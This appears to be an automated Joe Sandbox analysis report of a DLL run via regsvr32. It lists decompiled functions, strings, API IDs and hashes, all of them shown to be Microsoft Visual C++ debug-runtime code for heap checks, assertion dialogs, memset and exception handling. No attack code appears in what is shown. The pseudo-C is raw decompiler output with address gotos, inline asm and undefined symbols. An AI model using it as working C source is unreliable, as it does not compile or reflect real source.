                                                                                • String ID: %s(%d) : %s$(*_errno())$, Line $<file unknown>$Assertion failed!$Assertion failed: $P$Second Chance Assertion Failed: File $_CrtDbgReport: String too long or IO Error$_CrtDbgReport: String too long or Invalid characters in String$_VCrtDbgReportW$_itow_s(nLine, szLineMessage, 4096, 10)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrptt.c$strcpy_s(szOutMessage2, 4096, "_CrtDbgReport: String too long or Invalid characters in String")$wcscat_s(szLineMessage, 4096, L"\n")$wcscat_s(szLineMessage, 4096, L"\r")$wcscat_s(szLineMessage, 4096, szUserMessage)$wcscpy_s(szLineMessage, 4096, szFormat ? L"Assertion failed: " : L"Assertion failed!")$wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")$wcscpy_s(szUserMessage, 4096, L"_CrtDbgReport: String too long or IO Error")$wcstombs_s(&ret, szaOutMessage, 4096, szOutMessage, ((size_t)-1))$wcstombs_s(((void *)0), szOutMessage2, 4096, szOutMessage, ((size_t)-1))
                                                                                • API String ID: 4197005980-4190456261
                                                                                • Opcode ID: 4879bfb960a2721f9666c96030d6b34d6758162388cb50bc2d04b6b5102aed05
                                                                                • Instruction ID: d8ecc9a7044e005118e0bfad4d4bf094f6a50d29752a81e0893666371c22c8bf
                                                                                • Opcode Fuzzy Hash: 4879bfb960a2721f9666c96030d6b34d6758162388cb50bc2d04b6b5102aed05
                                                                                • Instruction Fuzzy Hash: 4B42083191CA8695EB70CB54E8543EA63F1FB85344F488236D6AD42A9DDFBCE14ACB40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                                                                • API String ID: 2574300362-564504941
                                                                                • Opcode ID: fee43fc66515416ac0980d72625433c0e8db806945977869f613c1f5f8def98f
                                                                                • Instruction ID: 010ee94f39955b91782510c016f4db19f7945676f3e0999e4be2c38d1f3ba03d
                                                                                • Opcode Fuzzy Hash: fee43fc66515416ac0980d72625433c0e8db806945977869f613c1f5f8def98f
                                                                                • Instruction Fuzzy Hash: 3951D935919A82D6E754DB25FC4436973F0FB86B50F588035DAAE426ACDFBCE489CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c, xrefs: 00007FFA524654F7, 00007FFA5246556D, 00007FFA524657FE
                                                                                • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer., xrefs: 00007FFA5246579F
                                                                                • _CrtIsValidHeapPointer(pUserData), xrefs: 00007FFA524654E2
                                                                                • _BLOCK_TYPE_IS_VALID(pHead->nBlockUse), xrefs: 00007FFA52465558
                                                                                • pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ, xrefs: 00007FFA524657E9
                                                                                • The Block at 0x%p was allocated by aligned routines, use _aligned_free(), xrefs: 00007FFA5246542B
                                                                                • Client hook free failure., xrefs: 00007FFA524654A0
                                                                                • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 00007FFA5246573C
                                                                                • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 00007FFA52465620
                                                                                • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer., xrefs: 00007FFA52465683
                                                                                Similarity
                                                                                • API ID: HeapPointerValid_free_base
                                                                                • String ID: Client hook free failure.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$The Block at 0x%p was allocated by aligned routines, use _aligned_free()$_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$_CrtIsValidHeapPointer(pUserData)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ
                                                                                • API String ID: 1656799702-182684663
                                                                                • Opcode ID: 708cd418722caba3a196df14d36aa04cdda5776576cdf5b3aec82fe9c7f2493c
                                                                                • Instruction ID: 4e6eb6cae9d86284d48b64b2d6c98f5dffd4c0b7c3edbd98b0fbc87091dcf5f5
                                                                                • Opcode Fuzzy Hash: 708cd418722caba3a196df14d36aa04cdda5776576cdf5b3aec82fe9c7f2493c
                                                                                • Instruction Fuzzy Hash: F9C1B936628B8187EB20CB55E85072A77F1FB86794F144536EA9D43B98DFBCE410CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 57%
                                                                                			E00007FFA7FFA52463280(void* __eax, signed int __ecx, signed int __edx, signed int __rcx, signed int __rdx, void* __r8) {
                                                                                				void* _t7;
                                                                                				void* _t10;
                                                                                				signed long long _t15;
                                                                                				signed long long* _t16;
                                                                                				signed long long _t20;
                                                                                				signed long long _t24;
                                                                                
                                                                                				_t7 = __rcx -  *0x5248b018; // 0x6ebca90f5d98
                                                                                				if (_t7 != 0) goto 0x5246329a;
                                                                                				asm("dec eax");
                                                                                				if ((__ecx & 0x0000ffff) != 0) goto 0x52463296;
                                                                                				asm("repe ret");
                                                                                				asm("dec eax");
                                                                                				goto 0x52463720;
                                                                                				asm("int3");
                                                                                				asm("int3");
                                                                                				asm("int3");
                                                                                				asm("int3");
                                                                                				asm("int3");
                                                                                				asm("int3");
                                                                                				asm("int3");
                                                                                				asm("o16 nop [eax+eax]");
                                                                                				if (__r8 - 8 < 0) goto 0x5246330c;
                                                                                				_t20 = __rdx * 0x1010101;
                                                                                				_t10 = __r8 - 0x40;
                                                                                				if (_t10 < 0) goto 0x524632ee;
                                                                                				_t15 =  ~__rcx;
                                                                                				if (_t10 == 0) goto 0x524632de;
                                                                                				 *__rcx = _t20;
                                                                                				_t16 = _t15 + __rcx;
                                                                                				if (_t10 != 0) goto 0x52463327;
                                                                                				_t24 = __r8 - _t15 & 7;
                                                                                				if (_t10 == 0) goto 0x5246330c;
                                                                                				 *_t16 = _t20;
                                                                                				if (_t10 != 0) goto 0x52463300;
                                                                                				if (_t24 == 0) goto 0x5246331b;
                                                                                				_t16[1] = __edx & 0x000000ff;
                                                                                				if (_t24 - 1 != 0) goto 0x52463311;
                                                                                				return __eax;
                                                                                			}










                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 3778485334-0
                                                                                • Opcode ID: c7ac20398f1e0bfcda68d30e042a710a2d00de73d3b00f2192fd5d70b0bf2831
                                                                                • Instruction ID: 649d26f573c52adf3eeb1586b5f6f82416c9858fc22fec97712887ab2e802f33
                                                                                • Opcode Fuzzy Hash: c7ac20398f1e0bfcda68d30e042a710a2d00de73d3b00f2192fd5d70b0bf2831
                                                                                • Instruction Fuzzy Hash: C731F736928B8296EB549B10FC4436A77F0FB46754F588035DAAD42B6DDFBCE088DB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _unlock
                                                                                • String ID: Client hook allocation failure at file %hs line %d.$Client hook allocation failure.$Invalid allocation size: %Iu bytes.$_CrtCheckMemory()$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                                                                • API String ID: 2480363372-3680694803
                                                                                • Opcode ID: 5582fb477a99f139482b647e65eadd7bcea0024aa5ad3136cc4be02f6e7bf908
                                                                                • Instruction ID: 5e070d75834cf15295f1452b9439ee815f71ad003e49b73e539612ad72b3fe3d
                                                                                • Opcode Fuzzy Hash: 5582fb477a99f139482b647e65eadd7bcea0024aa5ad3136cc4be02f6e7bf908
                                                                                • Instruction Fuzzy Hash: B4512031A186929AEB74CB24EC4176A73F4FB86354F188535D66D82B9DDFBCE4448B00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 33%
                                                                                			E00007FFA7FFA5246BE50(intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24) {
                                                                                				intOrPtr _v4;
                                                                                				void* _v12;
                                                                                				signed long long _v24;
                                                                                				signed int _v36;
                                                                                				long long _v180;
                                                                                				long long _v184;
                                                                                				intOrPtr _v192;
                                                                                				char _v196;
                                                                                				intOrPtr _v204;
                                                                                				long _v212;
                                                                                				long long _v220;
                                                                                				long long _v228;
                                                                                				long long _v1212;
                                                                                				long long _v1308;
                                                                                				char _v1460;
                                                                                				char _v1476;
                                                                                				char _v1484;
                                                                                				int _v1492;
                                                                                				long long _v1500;
                                                                                				long long _v1508;
                                                                                				long long _v1516;
                                                                                				long long _v1524;
                                                                                				long long _v1532;
                                                                                				long long _v1540;
                                                                                				void* _t51;
                                                                                				signed long long _t80;
                                                                                				long long _t85;
                                                                                				void* _t100;
                                                                                
                                                                                				_a24 = r8d;
                                                                                				_a16 = __edx;
                                                                                				_a8 = __ecx;
                                                                                				_t80 =  *0x5248b018; // 0x6ebca90f5d98
                                                                                				_v24 = _t80 ^ _t100 - 0x00000610;
                                                                                				if (_a8 == 0xffffffff) goto 0x5246be8d;
                                                                                				E00007FFA7FFA52468D90(_t51, _a8);
                                                                                				_v184 = 0;
                                                                                				memset(__edi, 0, 0x94 << 0);
                                                                                				_v1508 =  &_v196;
                                                                                				_v1500 =  &_v1460;
                                                                                				_v1492 = 0;
                                                                                				_v212 = 0;
                                                                                				__imp__RtlCaptureContext();
                                                                                				_t85 = _v1212;
                                                                                				_v220 = _t85;
                                                                                				r8d = 0;
                                                                                				0x52480e28();
                                                                                				_v228 = _t85;
                                                                                				if (_v228 == 0) goto 0x5246bf64;
                                                                                				_v1516 = 0;
                                                                                				_v1524 =  &_v1476;
                                                                                				_v1532 =  &_v1484;
                                                                                				_v1540 =  &_v1460;
                                                                                				0x52480e22();
                                                                                				goto 0x5246bf84;
                                                                                				_v1212 = _v12;
                                                                                				_v1308 =  &_v12;
                                                                                				_v196 = _a4;
                                                                                				_v192 = _a12;
                                                                                				_v180 = _v12;
                                                                                				_v1492 = IsDebuggerPresent();
                                                                                				SetUnhandledExceptionFilter(??);
                                                                                				_v212 = UnhandledExceptionFilter(??);
                                                                                				if (_v212 != 0) goto 0x5246bffb;
                                                                                				if (_v1492 != 0) goto 0x5246bffb;
                                                                                				if (_v4 == 0xffffffff) goto 0x5246bffb;
                                                                                				return E00007FFA7FFA52463280(E00007FFA7FFA52468D90(_t59, _v4), _v4, __edx, _v36 ^ _t100 - 0x00000610, _v204, _v220);
                                                                                			}
































                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 1239891234-0
                                                                                • Opcode ID: 3c99f19865488fa949415da8e2229a8dc4eaaacedc1a65a8015e4c0ea1d70d8e
                                                                                • Instruction ID: fe5abc9e94b0ada49c476ec2a3438ccbd446836a4771e7d60873314bebbb7d6c
                                                                                • Opcode Fuzzy Hash: 3c99f19865488fa949415da8e2229a8dc4eaaacedc1a65a8015e4c0ea1d70d8e
                                                                                • Instruction Fuzzy Hash: BD41CE32518BC09AE670CB14F8443ABB3A5FB89355F54522AD68D82BA8EF7DD095CF40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                • String ID:
                                                                                • API String ID: 1445889803-0
                                                                                • Opcode ID: 3c45f80db2f34b613ab4c9fa771cbb066be9ba5f1b7e4cdc55cd1e9c18cefb40
                                                                                • Instruction ID: ab03262765b84c2984aa44db1262b85f8d327d3f0a30ceb52ff4feb638ab7eff
                                                                                • Opcode Fuzzy Hash: 3c45f80db2f34b613ab4c9fa771cbb066be9ba5f1b7e4cdc55cd1e9c18cefb40
                                                                                • Instruction Fuzzy Hash: 2221E621619F0596DA70CB05FC5422A77E0FB8EBA4F581235EA9D83768EE7CD2948B00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invoke_watson_if_error$DebugOutputString$_invoke_watson_if_oneof$_itow_s_unlock_wcsftime_l
                                                                                • String ID: %s(%d) : %s$(*_errno())$, Line $<file unknown>$Assertion failed!$Assertion failed: $Second Chance Assertion Failed: File $_CrtDbgReport: String too long or IO Error$_CrtDbgReport: String too long or Invalid characters in String$_VCrtDbgReportA$_itoa_s(nLine, szLineMessage, 4096, 10)$e = mbstowcs_s(&ret, szOutMessage2, 4096, szOutMessage, ((size_t)-1))$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrptt.c$strcat_s(szLineMessage, 4096, "\n")$strcat_s(szLineMessage, 4096, "\r")$strcat_s(szLineMessage, 4096, szUserMessage)$strcpy_s(szLineMessage, 4096, szFormat ? "Assertion failed: " : "Assertion failed!")$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")$strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")$wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")$6o$Pl
                                                                                • API String ID: 242677333-579931786
                                                                                • Opcode ID: 90fb5dc47a0cb7e52882a682e6518eda47d2e5e2933cc617357387334d7819cd
                                                                                • Instruction ID: 53818dc8147dde87f9ada6454bf7c2ae980e55e18eadcbaa051399b7efb2184e
                                                                                • Opcode Fuzzy Hash: 90fb5dc47a0cb7e52882a682e6518eda47d2e5e2933cc617357387334d7819cd
                                                                                • Instruction Fuzzy Hash: 21320831918A8695E730CB10EC543EE73B1FB86345F888136D69D46AADDFBCE549CB80
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invoke_watson_if_error$FileModuleName
                                                                                • String ID: For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts.$File: $Line: $Module: $(*_errno())$...$<program name unknown>$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Expression: $Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowW$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrpt.c$memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)$wcscpy_s(szExeName, 260, L"<program name unknown>")$wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")
                                                                                • API String ID: 1949418964-1840610800
                                                                                • Opcode ID: 44b701395b3347ba89d33a25413c6d043cef3cadf6afd38b3a3e0c178ea01b00
                                                                                • Instruction ID: 89b674271132f6979c2a2596a2cf89858bbc84437daf96a5d449068cbd9d708c
                                                                                • Opcode Fuzzy Hash: 44b701395b3347ba89d33a25413c6d043cef3cadf6afd38b3a3e0c178ea01b00
                                                                                • Instruction Fuzzy Hash: E8F1E631518BC694E7348B50E8443AAB3F4FB89780F588135DA9D42BADEFBCE245CB40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invoke_watson_if_error$_invalid_parameter
                                                                                • String ID: For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts.$File: $Line: $Module: $(*_errno())$...$<program name unknown>$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Expression: $Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowA$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrpt.c$memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)$strcpy_s(szExeName, 260, "<program name unknown>")$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")$m*
                                                                                • API String ID: 2356156361-2279852085
                                                                                • Opcode ID: 2e784d19664e5a95b58b990f67b4737f05373876c1930d3c64995b1a0c69d3f2
                                                                                • Instruction ID: 79415a2073d48b77467c832ce25e931d28796ced32bd5d90067ecd8b6adf061f
                                                                                • Opcode Fuzzy Hash: 2e784d19664e5a95b58b990f67b4737f05373876c1930d3c64995b1a0c69d3f2
                                                                                • Instruction Fuzzy Hash: 9EC1F672518AC695EB348B11E8803EA77F0FB8A380F548136D69D42BADDFBCE155CB40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: FileHandleWrite
                                                                                • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $_NMSG_WRITE$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\crt0msg.c$wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"\n\n")$wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), error_text)$wcscpy_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"Runtime Error!\n\nProgram: ")$wcscpy_s(progname, progname_size, L"<program name unknown>")$wcsncpy_s(pch, progname_size - (pch - progname), L"...", 3)$_$0I$2H
                                                                                • API String ID: 3320372497-2837547082
                                                                                • Opcode ID: b64be2a8eca497eb38ff52dc13b3436bc691d1b4503f9f72973df8eece0bc5fb
                                                                                • Instruction ID: 0de45e4e75247185cc164d85a240ee1bc813713ec0713958bec889b57fe0c377
                                                                                • Opcode Fuzzy Hash: b64be2a8eca497eb38ff52dc13b3436bc691d1b4503f9f72973df8eece0bc5fb
                                                                                • Instruction Fuzzy Hash: 3D918332A1C68295EB60DB14E8583BA63F0FB86744F888136D69D436ADDFBCE145CB40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Pointer$Decode$AddressEncodeLibraryLoadProc
                                                                                • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                                • API String ID: 2256938910-232180764
                                                                                • Opcode ID: 7f66a9951f4a4371a03f8907a7d8dae5388e10f0167802e39e15e0e0cc6986ee
                                                                                • Instruction ID: 6c72bd837ae187ea32b7a709cb85caa490c6a04e90f031a1034bc8e7f37d6b9e
                                                                                • Opcode Fuzzy Hash: 7f66a9951f4a4371a03f8907a7d8dae5388e10f0167802e39e15e0e0cc6986ee
                                                                                • Instruction Fuzzy Hash: BD81D931929B8296E650DB15FC4436A73F0FB86B44F589035DAAE426ACDFBCE449CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~_$ByteCharMultiWidewcsncnt
                                                                                • String ID:
                                                                                • API String ID: 641786319-0
                                                                                • Opcode ID: dd68202ae9e70015e3243afc192c87c9af493ce1bfd3ef4005d4635320cae465
                                                                                • Instruction ID: 52180c2624b01c5ba5890315780781d510389b16c5b64587b8f9110e668b9b8a
                                                                                • Opcode Fuzzy Hash: dd68202ae9e70015e3243afc192c87c9af493ce1bfd3ef4005d4635320cae465
                                                                                • Instruction Fuzzy Hash: C102E73260CA8581E7609B15E8503ABB7B0FBC6760F588235E6AD47BE9DFBCD445CB40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 20%
                                                                                			E00007FFA7FFA524740B0(void* __ecx, void* __edi, void* __esi, void* __esp, void* __eflags, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, void* _a8, void* _a16, long long _a24, void* _a32, signed int* _a40, signed int _a48, signed int _a56, long long _a64) {
                                                                                				long long _v24;
                                                                                				long long _v32;
                                                                                				char _v56;
                                                                                				long long _v64;
                                                                                				long long _v72;
                                                                                				char _v80;
                                                                                				void* _v88;
                                                                                				void* _v96;
                                                                                				intOrPtr _v104;
                                                                                				void* _v112;
                                                                                				intOrPtr _v120;
                                                                                				void* _v128;
                                                                                				char _v132;
                                                                                				char _v136;
                                                                                				long long _v144;
                                                                                				signed int _v152;
                                                                                				char _v160;
                                                                                				signed char _v164;
                                                                                				signed int _v168;
                                                                                				char _v176;
                                                                                				char _v184;
                                                                                				long long _v192;
                                                                                				signed char _v200;
                                                                                				long long _v208;
                                                                                				signed int _v216;
                                                                                				signed int _v224;
                                                                                				long long _v232;
                                                                                				void* _t222;
                                                                                				void* _t244;
                                                                                				void* _t295;
                                                                                				long long _t302;
                                                                                				long long _t303;
                                                                                				intOrPtr _t311;
                                                                                				long long _t312;
                                                                                				long long _t321;
                                                                                				intOrPtr _t325;
                                                                                				long long _t329;
                                                                                				long long _t330;
                                                                                				long long _t332;
                                                                                
                                                                                				_t295 = __rax;
                                                                                				_a32 = __r9;
                                                                                				_a24 = __r8;
                                                                                				_a16 = __rdx;
                                                                                				_a8 = __rcx;
                                                                                				_v164 = 0;
                                                                                				_v152 = 0;
                                                                                				_v168 = E00007FFA7FFA52473B40(_a40, _a32);
                                                                                				E00007FFA7FFA5246E500(_a16, _a32, _a40,  &_v160);
                                                                                				if (_v168 - E00007FFA7FFA52473C70(_t295, _a16, _a32, _a40) <= 0) goto 0x52474176;
                                                                                				r9d = _v168;
                                                                                				E00007FFA7FFA52473BD0(_t217,  &_v160, _a32, _a40);
                                                                                				r9d = _v168;
                                                                                				E00007FFA7FFA52473C00(_v168 - E00007FFA7FFA52473C70(_t295, _a16, _a32, _a40), _t295, _a16, _a32, _a40);
                                                                                				goto 0x52474197;
